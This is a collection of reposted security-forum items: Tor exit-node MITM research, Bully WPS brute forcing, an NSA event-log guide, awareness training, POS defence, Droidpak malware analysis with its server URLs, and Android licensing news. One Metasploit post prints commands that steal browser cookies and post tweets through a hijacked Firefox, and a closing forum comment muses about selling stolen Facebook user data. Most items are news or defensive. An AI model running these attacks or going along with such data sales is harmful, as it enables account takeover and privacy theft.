The attackers in these cases used a bogus digital certificate to access traffic content; in the remaining 6 cases the impairment resulted from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper with traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection. The researchers passively eavesdropped on unencrypted web traffic at the exit nodes and, by checking the digital certificates used over Tor connections against the certificates used in direct "clear-web" sessions, discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers controlling the Russian nodes accessed the traffic and re-encrypted it with their own self-signed digital certificate issued to the made-up entity "Main Authority." It appears to be a well-organized operation: the researchers noted that after blacklisting the "Main Authority" Tor nodes, new ones using the same certificate would be set up by the same entity.

It is not clear who is behind the attack. Winter and Lindskog believe that the spying operation was conducted by isolated individuals rather than a government agency, because the technique adopted is too noisy: the attackers used a self-signed certificate that causes browser warnings for Tor users. "It was actually done pretty stupidly," says Winter. It must also be considered that intelligence agencies, including the NSA, are putting great effort into infiltrating the Tor network; one of the documents leaked by Edward Snowden on US surveillance explicitly refers to a project, codenamed Tor Stinks, to track Tor users in the deep web. Despite the high interest in the Tor network and its potential, it is still considered the best way to protect a user's anonymity online, and governments don't want this.
Pierluigi Paganini (Security Affairs – Tor network, Russia) Sursa: Who is spying on Tor network exit nodes from Russia?
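The detection approach described above (comparing the certificate seen through a Tor exit with the one served on a direct connection) is easy to reproduce in rough form. The sketch below is only an illustration of the idea, not the researchers' actual tool; it assumes a local Tor client with its SOCKS proxy on 127.0.0.1:9050, the PySocks package installed, and a placeholder target host, and it only observes whichever exit node the current circuit happens to use.

import hashlib
import socket
import ssl

import socks  # PySocks

HOST, PORT = "www.facebook.com", 443   # placeholder target

def cert_fingerprint(sock):
    # TLS without verification on purpose: we want to see whatever certificate
    # is presented, forged or not, and fingerprint it.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with ctx.wrap_socket(sock, server_hostname=HOST) as tls:
        der = tls.getpeercert(binary_form=True)
    return hashlib.sha256(der).hexdigest()

def direct_fingerprint():
    return cert_fingerprint(socket.create_connection((HOST, PORT), timeout=15))

def tor_fingerprint():
    s = socks.socksocket()
    s.set_proxy(socks.SOCKS5, "127.0.0.1", 9050)
    s.settimeout(30)
    s.connect((HOST, PORT))
    return cert_fingerprint(s)

if __name__ == "__main__":
    direct, via_tor = direct_fingerprint(), tor_fingerprint()
    print("direct :", direct)
    print("via tor:", via_tor)
    print("match" if direct == via_tor else "MISMATCH - possible MITM at the exit node")

A single mismatch is not automatic proof of tampering, since large sites serve different certificates from different servers; that is why the researchers repeated such comparisons across many exits over four months before drawing conclusions.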
14. Retrieve WPA/WPA2 passphrase from a WPS-enabled access point.

[h=1]OVERVIEW[/h]

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc.) regardless of architecture. Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.

Source: https://github.com/bdpurcell/bully
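A typical run targets a specific access point from a wireless interface that is already in monitor mode. The invocation below is only a rough example: the BSSID, channel and interface name are placeholders, and the exact option names are an assumption that may differ between versions, so check the project README or bully --help for your build.

bully -b AA:BB:CC:DD:EE:FF -c 6 mon0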
15. [h=1]PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB[/h]

January 25th, 2014, 14:45 GMT · By Silviu Stahie

PHP, an HTML-embedded scripting language with syntax borrowed from C, Java, and Perl, with a couple of unique PHP-specific features thrown in, has been updated to version 5.6.0 Alpha 1. PHP 5.x includes a new OOP model based on the Zend Engine 2.0, a new extension for improved MySQL support, built-in native support for SQLite, and much more. According to the changelog, constant scalar expressions have been implemented, variadic functions have been added, and argument unpacking has been added. Also, support for large (>2 GiB) file uploads has been added, SSL/TLS improvements have been implemented, and a new command line debugger called phpdbg is now available. You can check out the official changelog in the readme file incorporated in the source package for more details about this release. Download PHP 5.6.0 Alpha 1 right now from Softpedia.

Sursa: PHP 5.6.0 Alpha 1 Supports File Uploads Bigger than 2GB
16. Spotting the Adversary with Windows Event Log Monitoring

Author: National Security Agency/Central Security Service

Contents

1 Introduction
2 Deployment
2.1 Ensuring Integrity of Event Logs
2.2 Environment Requirements
2.3 Log Aggregation on Windows Server 2008 R2
2.4 Configuring Source Computer Policies
2.5 Disabling Windows Remote Shell
2.6 Firewall Modification
2.7 Restricting WinRM Access
2.8 Disabling WinRM and Windows Collector Service
3 Hardening Event Collection
3.1 WinRM Authentication Hardening Methods
3.2 Secure Sockets Layer and WinRM
4 Recommended Events to Collect
4.1 Application Whitelisting
4.2 Application Crashes
4.3 System or Service Failures
4.4 Windows Update Errors
4.5 Windows Firewall
4.6 Clearing Event Logs
4.7 Software and Service Installation
4.8 Account Usage
4.9 Kernel Driver Signing
4.10 Group Policy Errors
4.11 Windows Defender Activities
4.12 Mobile Device Activities
4.13 External Media Detection
4.14 Printing Services
4.15 Pass the Hash Detection
4.16 Remote Desktop Logon Detection
5 Event Log Retention
6 Final Recommendations
7 Appendix
7.1 Subscriptions
7.2 Event ID Definitions
7.3 Windows Remote Management Versions
7.4 WinRM 2.0 Configuration Settings
7.5 WinRM Registry Keys and Values
7.6 Troubleshooting
8 Works Cited

Download: http://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf
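The deployment chapters of the guide revolve around Windows Event Forwarding, i.e. the WinRM service on the computers that generate events and the Windows Event Collector service on the machine that aggregates them. As a very rough illustration of the moving parts (see the guide itself for the full, hardened procedure and the Group Policy equivalents), the built-in tools can be enabled from an elevated prompt like this:

winrm quickconfig     (on source computers: starts the WinRM service and creates a listener)
wecutil qc            (on the collector: enables the Windows Event Collector service)
wecutil es            (on the collector: lists the subscriptions that are currently configured)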
17. Improving the Human Firewall

Introduction

Most likely you will agree that security education is the thing that needs enhancement the most in companies worldwide – it is pointless to spend millions of dollars on the most recent software and hardware to defend the corporate networks against all kinds of internal and external threats only to get your systems exposed because an employee was tricked into divulging his credentials, just as Kevin Mitnick stated. The saying goes: "A chain is only as strong as its weakest link" and it is tightly related to information security, as attackers probe all possible points of access for vulnerabilities and usually choose the least resistant one. A report from Wisegate, a peer-based IT knowledge service, states that the threat from internal computer users is one of the biggest concerns when it comes to protecting corporate data. Furthermore, Wisegate claim that user security awareness was a top concern in 2013. Most companies already do training and have a relatively high expenditure on computer-based training programs. These training programs just do not prove as effective as they were planned to be. The key issue here is to differentiate between training and education – training employees involves actions while educating them involves results. The main goal of security awareness programs has to be aimed not at training the staff but at educating them and making them aware of the ways human psychology can be exploited. Hence, you need to bring effective results to the table instead of performing more and more actions. To achieve these results you need to make your staff grasp the concepts you are teaching them to the extent that it permits them to act properly when confronted with new situations. This means that your staff has to internalize the knowledge and information provided by your security awareness program.

Isn't the average Internet user already aware of the security issues that he might be confronted with? To illustrate our point, we looked at the Google search trends for a set of keywords: malware, phishing, social engineering, keygen, torrents, virus and antivirus. The results show that the trend of the search volumes for malware and phishing is highly inelastic (static). Compared to the search queries for keygens and torrents, the relative search volume of phishing and malware is quite small between 2004 and 2007. There is no data for the term social engineering for most periods due to its low demand. The curves for keygen and torrents show that between 2004 and 2007 many Internet users searched for keygens and torrents to get illegal access to paid software (at a generally declining rate), but their awareness of the possible implications of keygens, such as malware and social engineering, remained relatively stagnant. From 2008 up to now we see a slight increase in the search tendency for malware and phishing, while the query tendency for keygen and torrents has been falling at an increasing rate, and the forecast is that the queries for keygens and maybe torrents are going to fall below those of malware and phishing. Still, we can see that security awareness has had some impact on the behavior of Internet users, making them stray from the dark side of the Internet.
Nonetheless, this decline in piracy and risky behavior is also due to other factors, such as better enforcement of copyright laws, removal of access to websites with illegal content by ISPs, and closure of online businesses operating in the grey market by governments, inter alia. However, if we compare the queries for torrents with the queries for virus and antivirus we get a pretty interesting picture. It appears that nowadays antivirus is as in-demand a keyword as virus, and more in demand than keygen, torrents, social engineering, phishing and malware. It appears that end users rely not on prevention but on post-infection treatment as a safety mechanism. Also, the keywords virus and anti-virus are trending more than torrents and are several times more popular than social engineering, phishing and malware, which points to the low safety precautions of the average Internet user: responsibility for Web safety appears to end with installing anti-virus software while ignoring the safe use of the Internet. Related queries for "virus" appear to be "anti virus", "virus download", "antivirus", "virus scan", "free anti virus", "avg", "avg virus", "virus removal", "virus protection", among others, which shows the overall direction of the users' input for the keyword "virus". We can conclude from the above illustrations that the need for Web safety and security awareness is as high as ever, underlining the need to improve the current security awareness programs that companies undertake.

If I have to educate and not train, what should I change?

Firstly, you should start by organizing group lunches with a security-oriented purpose. Every employee appreciates a good lunch and/or dessert, so attendance at such meetings will be high. Such an informal meeting is a great way to get your staff together and talk about security issues. Most likely, organizing lunches once or twice a week for different groups will raise the security awareness of your staff without having to resort to dry lectures, relying instead on overall participation and group-wide discussion. In these lunches, you can begin to spot regular attendees who have the potential to become champions within the different work groups and who can later help educate the other employees in their group.

Secondly, you can try to bring in outside security professionals, as they are usually eager to earn CPE (continuing professional education) credits, even more so if you add some goodwill gesture. The local security pros can present security issues or discuss security with your employees.

Thirdly, you should provide your employees with information on maintaining Internet safety at home. Such discussions are always well attended, even more so if you show them something relevant to them such as how to keep kids safe at home. The information must really affect them personally and they must find it relevant to keep them focused and engaged so that they can absorb it. Links, whitepapers and any kind of training on such topics would be well received.

Fourthly, you should make appointments with business unit leaders to discuss security issues and topics relevant to their area. It does not have to be in the office; more informal settings are also beneficial. The point here is that it is important to show them that you are thinking about their problems and attempting to remedy them; in this way they can understand and help with your concerns as well.
Fifthly, the old way of hanging posters on the wall and distributing newsletters can also be effective. The posters have to be attention-grabbing and have to be replaced frequently. A column in a newsletter would be beneficial if it is interesting and relevant. Tips are usually not interesting and relevant as they are self-serving, unless they provide some advice on safety at home, which automatically makes them relevant.

Sixthly, anecdotes and metaphors may help spread the word. For instance, you can rely on the story of Ali Baba to teach the staff about password security, strength and shoulder surfing.

Seventhly, create a security mentoring/tutoring option. It is possible that nobody signs up for it, but if someone does you should enable him to take advantage of such an option. The mentoring may include one-on-one sessions and would help in spotting employees gifted in security awareness, shaping a champion among your staff who can educate the others during the course of work.

Eighthly, you should offer your employees ride-alongs whereby you give them the opportunity to see what the IT or security program actually looks like from the inside. The opposite should be done as well – letting IT and security staff get a glimpse of what a day in the employees' workplace looks like may also be useful.

Finally, you should strive to create an environment of teamwork, as it is proven that good teamwork brings several positive features with it, such as:

Better problem-solving capabilities
Quicker completion of tasks
Competition which leads personnel to excel at what they do
A combination of different unique qualities, which may lead to better efficiency in the employees' decision-making

(References regarding these four features can be found at the bottom of the article.) As Henry Ford once said, "Coming together is a beginning. Keeping together is progress. Working together is success."

Testing the human firewall

Testing the human firewall is easy, so you can effortlessly track the company's progress. The first and most commonly employed way to test the human firewall is through written tests, which come in the form of online multiple-choice tests and usually take place after a computer-based learning session. Alternatively, you can test the human firewall with a seemingly real social engineering attack. You have various techniques at your disposal for the attack: pretexting, phishing, theft with diversion, tailgating, quid pro quo or any combination of these. You can resort to websites such as phishme.com to fake a phishing campaign against your company, carry out the attack yourself or hire external security professionals to raise the bar even higher. Below are sample questions and answers of the kind that can be used when testing your personnel's security awareness.

What are some important tips when it comes to improving the human firewall?

Simple labels that classify data as protected and unprotected, such as "confidential" and "public", are a great place to start.
Prohibiting password reuse and teaching the human firewall good password habits is crucial.
The security staff has to become more accessible to the employees. This, on its own, will motivate the latter to share their problems and ask questions, on the one hand, and will aid the security staff in assessing the efficiency of their security programs, on the other hand.
When reporting the results from security awareness tests, it is preferable to share them either anonymously or statistically. However, if negative trends arise from particular employees or groups of employees, share those results with the proper persons and attempt to solve those issues without putting any blame on the people who fall behind with their security education.

Teach employees not to store any company data on their smartphones.
Teach personnel not to connect USB drives, external hard disks or any writeable media to their workplace computers.
To reduce social engineering attacks against your employees, limit the information that can be gathered about them during the reconnaissance stage of the attack (this involves educating them not to divulge too much information about themselves in the public domain).
Remove any organization charts which reveal employees' names, job positions and photos from the company's public website.
Teach the personnel to handle external contacts properly through systematic training.
Teach the personnel not to respond to accusations instantaneously but to turn to colleagues, legal staff, etc. before handling complaints.
Teach personnel to limit the information they provide on social networks and other public domain sources such as Facebook.

Conclusion

It can be concluded from our discussion above that attempts at improving the human firewall have already started worldwide. Their success varies depending on factors such as preliminary awareness, and the enforceability and rigidity of the laws in the particular country, inter alia. Most methods of improving the human firewall involve modifying strategies that are already in place in companies, such as transforming the information delivered to employees in a way that makes it relevant to them and affects them personally, or transforming posters and newsletters so that they drop generic tips in favour of anecdotes and metaphors, which encourages employees to read the advice and makes the rules easier to remember. Some methods involve a totally new strategy for some companies – like performing ride-alongs so the IT staff can better understand the other employees and vice versa. We have also seen that testing the results of such security awareness education does not take a lot of effort, but it is highly valuable as it can reveal the weak spots, or the weakest links, of your human firewall. Finally, we have provided some advice that addresses relatively recent issues regarding the operation of the human firewall. For instance, prohibiting the storage of company data on smartphones is one possible solution to the BYOD problem that has emerged only recently.

References:

Richard O'Hanley, James S. Tiller and others, 'Information Security Management Handbook', 6th edition, Volume 7
Munir Kotadia, "'Human firewall' a crucial defence: Mitnick", Apr 14, 2005, Available at: 'Human firewall' a crucial defence: Mitnick | ZDNet
Laneye, 'Managers under attack', Available at: Social Engineering - Managers under attack
Business Wire, 'New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013', Jan 23, 2013, Available at: New Research from Wisegate Reveals Why Security Awareness is Top Concern of CISOs in 2013 | Business Wire
University of California, MERCED, 'Security Self-Test: Questions and Scenarios', Available at: Security Self-Test: Questions and Scenarios | Information Technology
Ken Hess, 'The second most important BYOD security defense: user awareness', Feb 25, 2013, Available at: The second most important BYOD security defense: user awareness | ZDNet
LePine, Jeffery A., Ronald F. Piccolo, Christine L. Jackson, John E. Mathieu, and Jessica R. Saul (2008). "A Meta-Analysis of Teamwork Processes: Tests of a Multidimensional Model and Relationships with Team Effectiveness Criteria". Personnel Psychology 61 (2): 273–307.
Hoegl, Martin, and Hans Georg Gemuenden (2001). "Teamwork Quality and the Success of Innovative Projects: a Theoretical Concept and Empirical Evidence". Organization Science 12 (4): 435–449.

By Ivan Dimov | January 24th, 2014

Sursa: Improving the Human Firewall - InfoSec Institute
18. New Metasploit Payloads for Firefox Javascript Exploits

Posted by joev in Metasploit on Jan 23, 2014 3:57:54 PM

Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads:

firefox/shell_reverse_tcp
firefox/shell_bind_tcp
firefox/exec

These are Javascript payloads meant for executing in a privileged Javascript context inside of Firefox. By calling certain native functions not meant to be exposed to ordinary web content, a classic TCP command shell can be opened. To a pentester, these payloads are useful for popping platform-independent in-process shells on a remote Firefox instance.

How does it work?

Firefox contains a Javascript API called XPCOM which consists of privileged native methods primarily implemented as C++ bindings. This API is commonly invoked by Firefox Addons and is also used by the "glue" code running inside the Firefox browser itself. If you can find a way to run Javascript code with access to XPCOM - either by convincing the user to install an untrusted addon or by finding a privilege escalation exploit in Firefox itself - you can open a raw TCP socket and run executables with Javascript. By using some shell redirection, we can get a working command shell connection back to a metasploit instance. We currently have three Firefox privilege escalation exploits in the framework:

exploit/multi/browser/firefox_svg_plugin (Firefox 17.* + Flash)
exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*)
exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions)

Why is it better?

The Javascript payloads are able to maintain shell sessions without dropping a native exe to the disk, which makes their presence significantly harder to detect. Another immediate benefit is that our existing Firefox exploits can now be included in BrowserAutopwn, since the target is static. Additionally, since the payload still has access to the Firefox Javascript environment, we can just as easily eval Javascript code, which makes things like cookie extraction or XSS attacks very easy. As an example I wrote a post module, post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed:

msf> use post/firefox/gather/xss
msf> set SESSION 1
msf> set URL https://rapid7.com
msf> set SCRIPT "send(document.cookie);"
[+] id=f612814001be908ds79f

Or, with a slightly more advanced script which sends a tweet in the target browser:

msf> set URL https://twitter.com
msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';"
[+] sent

Note: You can use return or send to send back data, but you can only send once.

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

Sursa: https://community.rapid7.com/community/metasploit/blog/2014/01/23/firefox-privileged-payloads
  19. Tech Insight: Defending Point-of-Sale Systems John H. Sawyer US-CERT publishes advice on defending POS systems against attacks like those against Target, Neiman Marcus. Major hacks at retailers that include Target and Neiman Marcus have put a new spotlight on the security of point of sale (POS) systems. What may come as a surprise to some is that the memory-scraping malware attacks were nothing new. Last year, Visa published two "Visa Data Security Alerts" warning merchants of an increase in attacks targeting credit card data with specific references to memory-scraping malware. The alerts were published in April and August. The first stated that Visa has seen an increase in network intrusions involving grocery merchants since January 2013. August's update used nearly the same verbiage but mentioned retail instead of grocery. The part that's of particular interest is how the attackers were carrying out the attacks. "Once inside the merchant's network, the hacker will install memory parser malware on the Windows based cash register system in each lane or on Back-of-the-House (BOH) servers to extract full magnetic stripe data in random access memory (RAM)." With two notices earlier in the year, retailers breached in the 4th quarter had early notification that attacks specifically targeting POS systems had been seen increasing. The alerts from Visa even included details on how to protect POS and related PCI systems from the types of attacks being carried out. So how is it that companies who were considered PCI compliant had their POS devices and PCI environment compromised? From a penetration tester's perspective, it is all too common to find merchants considered compliant as not necessarily secure. As an industry, we've been saying for years that compliance does not equal security and these big data breaches are classic examples. It is easy to fill out a form that certain controls are in place, but the harsh reality is that rarely are those controls actually tested thoroughly to ensure their effectiveness at protecting cardholder data. US CERT, part of the Department of Homeland Security, issued Alert TA14-002A on January 2, 2014 titled "Malware Targeting Point of Sale Systems." The document discusses hardware and software attacks against POS systems and includes specific recommendations on protecting them. Unlike the Visa Alerts, US CERT has put together guidance that focuses specifically on security best practices without mentioning specialized hardware and software (i.e. EMV-enabled PIN-entry, SRED-enabled devices, PA-DSS compliant payment applications). Alert TA14-002A targets 6 areas that POS administrators should follow: Use Strong Passwords: During the installation of POS systems, installers often use the default passwords for simplicity on initial setup. Unfortunately, the default passwords can be easily obtained online by cybercriminals. It is highly recommended that business owners change passwords to their POS systems on a regular basis, using unique account names and complex passwords. Default passwords are the low-hanging fruit that penetration testers tend to go for first. It's amazing how often network devices and application servers are set up on a network with default passwords in place. Whether it's an administration interface for Apache Tomcat or something like HSRP for Cisco routers, it's difficult to find a network that doesn't have at least one system with a default password. 
A vulnerability scanner like Nessus or NeXpose can help with finding these default passwords, but manual verification should be done also, as vulnerability scanners don't have the default passwords for every device. Update POS Software Applications:Ensure that POS software applications are using the latest updated software applications and software application patches. POS systems, in the same way as computers, are vulnerable to malware attacks when required updates are not downloaded and installed on a timely basis. Keeping POS applications updated should be part of the patch management strategy for every merchant. The common hurdle is that new versions generally cost money, which causes companies to avoid upgrades until technical problems arise. While the risks to POS software can sometimes be mitigated through other security controls like host intrusion prevention software (HIPS) and firewalls, it's important that merchants remember that new versions also bring security and bug fixes that can help keep cardholder data safe -- they'll need to bite the bullet eventually and upgrade. Install a Firewall: Firewalls should be utilized to protect POS systems from outside attacks. A firewall can prevent unauthorized access to, or from, a private network by screening out traffic from hackers, viruses, worms, or other types of malware specifically designed to compromise a POS system. A key tenet of the PCI DSS is network segmentation and firewalls are essential. Host- and network-based firewalls should be utilized as part of a layered security approach. Traffic should only be allowed to and from the POS to systems that are similarly hardened against attack. Where possible, the traffic should also be monitored by an intrusion detection/prevention system to detect and/or prevent attacks. Use Antivirus: Antivirus programs work to recognize software that fits its current definition of being malicious and attempts to restrict that malware's access to the systems. It is important to continually update the antivirus programs for them to be effective on a POS network. US-CERT is on target with its advice to use updated antivirus, but anti-malware protections should not stop there. Merchants should consider implementing a full endpoint protection suite that includes antivirus, HIPS, firewall, traffic inspection, and application whitelisting. While these solutions are not foolproof, they raise the bar for exploitation considerably. Restrict Access to Internet: Restrict access to POS system computers or terminals to prevent users from accidentally exposing the POS system to security threats existing on the Internet. POS systems should only be utilized online to conduct POS-related activities and not for general Internet use. Unless the POS application specifically needs Internet access, then it should be completely firewalled off from the Internet. In the situation that the POS software does need to communicate with systems on the Internet, firewalls should be used to strictly block all traffic except that to authorized systems. Application proxies should be used to proxy and inspect traffic to and from the Internet. Disallow Remote Access: Remote access allows a user to log into a system as an authorized user without being physically present. Cybercriminals can exploit remote access configurations on POS systems to gain access to these networks. To prevent unauthorized access, it is important to disallow remote access to the POS network at all times. 
This is the only area of advice from US-CERT that might be considered overkill, as it's going to make authorized remote management impossible. With proper firewall configurations restricting access only to authorized management workstations and multi-factor authentication, remote access is perfectly acceptable. Of course, this is where companies get in trouble, as they aren't always diligent in ensuring firewall configurations are correct and the machines accessing them are secured. POS systems are not difficult to secure if merchants simply follow the advice that has been put out by Visa and US-CERT. Most of the advice is based on security best practices that have been around for years. Unfortunately, it often takes a data breach for companies to have their eyes opened to the impact their negligence can have on their customers and their brand. Will Target, Neiman Marcus, and other retailers' recent troubles be the impetus companies need to secure their systems, or will they have to experience it firsthand? Sursa: Tech Insight: Defending Point-of-Sale Systems -- Dark Reading
20. Discovered first Win trojan to serve banking Android malware on mobile

by paganinip on January 25th, 2014

Symantec experts recently came across Windows malware that attempts to infect connected Android devices by serving an Android banking trojan.

Researchers at the antivirus firm Symantec have discovered malicious code that is able to infect Android mobile devices with banking malware during synchronization. The malware, which targets Windows users, can compromise a user's smartphone during file transfer, device syncing and backup operations. The infection process starts with a trojan, dubbed Trojan.Droidpak by the security experts, that drops a malicious DLL and registers it as a system service. Droidpak then downloads a configuration file from the following remote server:

http://xia2.dy[REMOVED]s-web.com/iconfig.txt

The file contains the information needed to download a malicious APK and store it at the following location on the infected PC:

%Windir%\CrainingApkConfig\AV-cdk.apk

The Android malware analyzed seems to be specifically designed for the Korean population, because the malicious APK searches for certain Korean online banking applications on the infected device. The communication between the mobile device and the compromised PC is handled through the Android Debug Bridge (ADB), a command line tool that allows the malicious code to execute commands on any Android smartphone connected to the infected computer. ADB is a legitimate tool included in the Android software development kit (SDK). When the victim connects an Android device with USB debugging mode enabled, the trojan launches the installation process and infects the smartphone by dropping the Android malware. Once it has infected the device, it installs an app that appears to be a Google App Store.

Android is the most targeted OS among cyber criminals because of its large user base; numerous malware families were created in 2013 to hit mobile users, and an increasing number of hacking tools is available in the underground for attacking such a powerful platform. The peculiarity of Trojan.Droidpak is that, for the first time, Windows malware was used to install a banking trojan on a mobile device. The banking trojan, detected as Android.Fakebank.B, implements features common to this category of malware, including SMS interception and MITM capabilities. Researchers at Symantec discovered that the Android.Fakebank.B malware sends data back to the following attacker's server:

http://www.slmoney.co.kr[REMOVED]

The experts provided a few suggestions for protecting systems from this Android malware when connecting a device to a Windows-based computer:

Turn off USB debugging on your Android device when you are not using it
Avoid connecting your droid to public computers
Only install reputable security software
Keep your system, software and antivirus up to date

Pierluigi Paganini (Security Affairs – Android Malware, Banking trojan)

Sursa: https://www.facebook.com/
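Because the whole infection path relies on the legitimate ADB channel, the same channel can be used defensively to see what actually ended up on a device. The sketch below is only an illustration, not a Symantec tool: it assumes the Android platform-tools adb binary is on the PATH and USB debugging is enabled, and it simply lists third-party packages so an unexpected fake "Google App Store"-style app stands out.

import subprocess

def adb(*args):
    # Runs the legitimate adb client; requires platform-tools on PATH and an authorized device.
    result = subprocess.run(["adb", *args], capture_output=True, text=True, check=True)
    return result.stdout

if __name__ == "__main__":
    print(adb("devices"))                                         # connected devices and their state
    packages = adb("shell", "pm", "list", "packages", "-3")       # -3 = third-party packages only
    for line in sorted(packages.splitlines()):
        print(line)                                               # review for apps you did not install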
  21. Why Google Android software is not as free or open-source as you may think Basic Android software may be free, but it doesn’t include the apps that make up Google’s mobile services Android software is free and open-source, but without Google Play, a device will have minimal functionality. Photograph: Beawiharta/Reuters Charles Arthur and Samuel Gibbs Thursday 23 January 2014 16.44 GMT • This article was amended on 24 January 2014 to reflect a clarification from Google that it does not charge manufacturers for Android licenses. The idea that Google’s Android mobile software is both “free” and open-source is so often repeated that it is virtually an article of faith online. There’s only one problem: neither is strictly true. While the basic Android software is indeed available for free, and can be downloaded, compiled and changed by anyone, it doesn’t include the apps that make up Google’s mobile services - such as Maps, Gmail, and crucially Google Play, which allows people to connect to the online store where they can download apps. Without them, a device has only minimal functionality. To get the key apps, a manufacturer needs a “Google Mobile Services” (GMS) licence. GMS licences are issued on a per-model basis. While Google does not charge a fee for the licence, one of the integral steps in the licence-application process requires payment to authorised Android-testing factories. These factories, which include Foxconn and Archos, charge a fee for carrying out the testing required to obtain a GMS licence, which the Guardian understands is negotiated on a case-by-case, per-manufacturer basis. Google activates more than 1 million devices with GMS licences every day The Guardian understands that in one example, testing costs $40,000, payable 50% up front and 50% at the completion of testing for a model with an expected run of at least 30,000 units. The source said Google and its testing partners were being intentionally vague about the fact that a cost is associated with acquisition of a GMS licence, even if the licence itself is free. “It is a lot of money they make, but you can’t see it anywhere because that would tarnish their ‘Android open-source’ karma,” the source said. However, there’s no definitive price list for GMS licence process; the authorised testing factories are understood to vary this depending on the number of devices being ordered and the size of the manufacturer or retailer. “Deals are done on an individual basis and are very opaque,” one source in the Android device community, who didn’t want to be identified, told the Guardian. Google didn’t respond to a request for information about GMS pricing, and there is no publicly available list online. Haphazard and time-consuming But the process of getting GMS licences appears to be haphazard and time-consuming. “Installing Google Play without a GMS licence is illegal,” the source said. But, they explained, Google “don’t have the internal manpower to police it properly. It’s a volume game. Big OEMs [device manufacturers] pay. Smaller OEMs don’t register in Google’s radar, and they [Google] tend to turn a blind eye. Retailers get pressured by legal OEMs to make sure illegal installs of GMS are weeded out. It’s almost like crowdsourcing.” That “crowdsourcing” seems to have been KMS Components’ downfall. Argos complained to the Welsh company that the MyTablet which it had provided did not have a GMS licence. 
This was after Argos had publicly promoted the tablet as excitement about a “tablet Christmas” ramped up following Tesco’s announcement in September that it would sell its Hudl 7in tablet. Although Google could take out injunctions to prevent retailers selling unlicensed tablets that include GMS, there’s no record of it ever having done so. However in August 2010 Augen Electronics, the maker of a $150 tablet being sold through the giant American retail chain Kmart, abruptly withdrew it from sale there because it included “unauthorised versions” of the GMS suite. Compatibility club Separately, trial documents released from a dispute between Google and Skyhook, a provider of location services, in 2011 revealed internal emails in which Dan Morrill of Google told another staffer that it’s “obvious to the OEMs that we are using [GMS] compatibility as a club to make them do what we want.” Motorola, then an independent company, told Skyhook that Android devices are “approved essentially at Google’s discretion”. Skyhook had wanted Android device makers to use its location service rather than Google’s. Android compatibility testing is a key precursor step to being awarded a GMS licence. But such testing, and subsequently getting a licence from Google, can be a test in its own right, sources say. One described having to take the matter up with a senior Google vice-president to get the GMS licensing approved. “Smaller OEMs lose out, as they have a hard time getting the GMS licence, and therefore have little alternative but to go without it,” the source said. Yet it is possible to bypass that. End-users can legally install the GMS suite of apps if they know how to. The idea that Android is “open source” is partially true: the source code for the software is available online, via Google’s servers, and anyone can download it and make changes - as Amazon, for example, has done to create its own version for its Kindle line of tablets. But unlike the vast majority of widely used open-source projects such as Linux, MySQL, PHP or Python, which welcome outside contributors, only people working inside Google can make changes that will become part of the future direction of the software. Device manufacturers who want to get the upcoming version of Android have to wait for it to become available from Google’s servers. Sursa: Why Google Android software is not as free or open-source as you may think | Technology | theguardian.com
  22. Nytro

    Fun stuff

    https://www.youtube.com/watch?v=ITR88wT8ekM&desktop_uri=%2Fwatch%3Fv%3DITR88wT8ekM&app=desktop
24. After the SQL-I crowd, this is the new generation of "hackers". This world is going to the dogs.
25. Access to the data of a company worth around 100 billion dollars? It depends on how much access you would have and where. If you dumped the facebook_users table, its value would easily exceed $10 million. If you sold it to China or Russia you could probably buy yourself an exotic island and a few thousand virgins. And it is not just the users; there are also private messages, private photos/videos and plenty of other useful things: friend lists, events, visited locations, IP addresses and who knows what other data Facebook keeps.